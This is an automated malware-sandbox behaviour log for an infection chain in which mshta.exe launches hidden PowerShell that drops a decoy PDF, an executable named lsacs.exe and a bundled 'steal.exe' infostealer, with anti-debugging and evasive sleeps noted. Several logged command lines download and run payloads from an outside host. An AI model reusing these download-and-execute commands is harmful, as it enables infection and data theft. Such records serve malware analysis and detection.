Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\lsacs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\lsacs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\lsacs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\lsacs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\lsacs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\lsacs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1840 Thread sleep count: 9475 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1400 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572 Thread sleep count: 9497 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pyexpat.pyd Jump to dropped file
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_eksblowfish.pyd Jump to dropped file
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_decimal.pyd Jump to dropped file
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pythoncom39.dll Jump to dropped file
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_uuid.pyd Jump to dropped file
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_elementtree.pyd Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9475 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9497 Jump to behavior
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 857 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9768 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe API coverage: 2.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F650EB0 GetSystemInfo, 19_2_00007FFC0F650EB0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C7DDC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF6A42C7DDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\lsacs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: powershell.exe, 00000003.00000003.361575887.00000216C68C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: mshta.exe, 00000000.00000003.282978341.00000242AB5CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283782712.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283782712.00000242AB5CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282978341.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283850237.00000242AB650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282798069.00000242AB650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.345843094.0000021CB9638000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C4548 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6A42C4548
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C9B98 GetProcessHeap, 18_2_00007FF6A42C9B98
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BB754 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 18_2_00007FF6A42BB754
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C4548 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6A42C4548
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BBE4C SetUnhandledExceptionFilter, 18_2_00007FF6A42BBE4C
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BBC68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6A42BBC68
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BB510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF6A42BB510
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F76F3E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFC0F76F3E4
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Remove-Item C:\Users\user\Downloads\Presidents_Strategy_2023.rar Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\programdata\file.pdf Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\ProgramData\lsacs.exe C:\programdata\lsacs.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ecb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cbc.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cfb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ofb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ctr.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_strxor.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_BLAKE2s.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA1.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA256.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_MD5.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_Salsa20.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Protocol\_scrypt.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_cpuid_c.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_portable.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_clmul.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ocb.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aesni.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\ProgramData VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073 VolumeInformation Jump to behavior
